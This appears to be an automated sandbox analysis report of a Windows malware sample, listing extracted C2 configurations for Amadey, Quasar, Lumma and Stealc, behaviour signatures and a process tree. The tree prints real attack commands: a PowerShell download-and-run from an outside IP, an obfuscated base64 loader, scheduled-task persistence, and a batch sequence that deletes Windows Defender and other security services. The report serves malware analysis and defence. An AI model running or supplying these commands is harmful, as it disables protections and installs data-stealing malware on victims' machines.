Analysis

  • max time kernel
    135s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 13:56

General

  • Target

    2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    3888a76a57addf78b255790998585788

  • SHA1

    d1386c608e1ab9f9a861564e5a96ec1f17645953

  • SHA256

    12b3896594e0d615701eb440899aa6cac15d69a162401ccab136b1d6416d5b22

  • SHA512

    3497ba893ba8335b1f8bb7a86e3c6e1bf5b23e78baef73c49787cc64e88a8ccc79746a890932e9d6d2b3937fc3ab4e9f470d1d32f3c6b5e9cadfc13eb3270379

  • SSDEEP

    24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a01u:eTvC/MTQYxsWR7a01

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://xcastmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://7targett.top/dsANGt

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 19 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 47 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 27 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2544
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:13192
    • C:\Users\Admin\AppData\Local\Temp\2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5124
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn RGtt7maNgDY /tr "mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5936
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn RGtt7maNgDY /tr "mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:216
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3324
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Users\Admin\AppData\Local\TempSJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE
            "C:\Users\Admin\AppData\Local\TempSJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4856
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3248
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5016
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1032
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3648
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5348
              • C:\Users\Admin\AppData\Local\Temp\10374380101\360fb735d9.exe
                "C:\Users\Admin\AppData\Local\Temp\10374380101\360fb735d9.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5664
                • C:\Users\Admin\AppData\Local\Temp\221.exe
                  "C:\Users\Admin\AppData\Local\Temp\221.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3300
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BB22.tmp\BB23.tmp\BB24.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5352
                    • C:\Users\Admin\AppData\Local\Temp\221.exe
                      "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:2352
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BBED.tmp\BBEE.tmp\BBEF.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                        10⤵
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:4308
                        • C:\Windows\system32\sc.exe
                          sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                          11⤵
                            PID:4928
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:208
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            11⤵
                            • Delays execution with timeout.exe
                            PID:6024
                          • C:\Windows\system32\sc.exe
                            sc stop ddrver
                            11⤵
                            • Launches sc.exe
                            PID:2088
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:1244
                          • C:\Windows\system32\takeown.exe
                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:2104
                          • C:\Windows\system32\icacls.exe
                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:1404
                          • C:\Windows\system32\sc.exe
                            sc stop "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:5940
                          • C:\Windows\system32\sc.exe
                            sc delete "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:1984
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                            11⤵
                              PID:2960
                            • C:\Windows\system32\sc.exe
                              sc stop "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2348
                            • C:\Windows\system32\sc.exe
                              sc delete "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:6000
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                              11⤵
                                PID:736
                              • C:\Windows\system32\sc.exe
                                sc stop "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:1504
                              • C:\Windows\system32\sc.exe
                                sc delete "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:5828
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                11⤵
                                  PID:1676
                                • C:\Windows\system32\sc.exe
                                  sc stop "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1964
                                • C:\Windows\system32\sc.exe
                                  sc delete "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4480
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                  11⤵
                                    PID:4648
                                  • C:\Windows\system32\sc.exe
                                    sc stop "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3884
                                  • C:\Windows\system32\sc.exe
                                    sc delete "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:4808
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                    11⤵
                                    • Modifies security service
                                    PID:4720
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:464
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3132
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                    11⤵
                                      PID:4920
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4400
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4660
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                      11⤵
                                        PID:4836
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefsvc"
                                        11⤵
                                          PID:4544
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefsvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:4700
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                          11⤵
                                            PID:4676
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefusersvc"
                                            11⤵
                                              PID:2600
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                                PID:4716
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                11⤵
                                                  PID:5496
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdNisDrv"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5856
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdNisDrv"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5724
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                  11⤵
                                                    PID:3560
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdBoot"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4524
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdBoot"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:544
